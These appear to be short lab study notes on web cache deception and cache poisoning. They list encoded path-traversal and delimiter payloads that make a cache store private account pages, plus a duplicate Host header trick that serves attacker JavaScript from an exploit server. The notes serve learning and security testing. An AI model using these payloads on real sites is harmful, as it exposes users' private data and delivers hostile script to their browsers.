- Normal Searching

---------------------------------------------------------------------------------
- Get /my-account
- Get /my-account/abc ---> 404? origin server doesn't abstract path to /my-account
- Get /my-accountabc  ---> 404? no evidence of caching.
- Get /my-account§§abc (Intruder) Delimiter discrepancies (find path delimiter)

---------------------------------------------------------------------------------
## Path Caching
- Get /<arbitrary directory>/..%2fmy-account ---> See how it resolve 200 | 400
- Try encoding or not the Delimiter discrepancies
- Find a ressource that work with caching (Images, ressources, ...)

---------------------------------------------------------------------------------
## If the cache server resolves encoded dot-segments but the origin server doesn't, you can exploit this by crafting a payload like this:
- Get /<dynamic-path>%2f%2e%2e%2f<static-directory-prefix> (encoding ..)
- ex: /profile%2f%2e%2e%2fstatic
	- The cache interprets the path as: /static
	- The origin server interprets the path as: /profile%2f%2e%2e%2fstatic

- ex: /profile;%2f%2e%2e%2fstatic
	- The cache interprets the path as: /static
	- The origin server interprets the path as: /profile

- Use delimiter & cached path /my-account?%2f%2e%2e%2fresources

- Use certain files (robots.txt, index.html, and favicon.ico)
- /profile%2f%2e%2e%2findex.html

# Poison header (Targeting Element Source)

GET / HTTP1.1
Host: website.com
Host: exploit-server.net

Then on the exploit server, create directory and files and try to impersonate the JS file from website.com so that when the page loads, it uses exploit-server.net for the JS file instead of website.com.

---------------------------------------------------------------------------------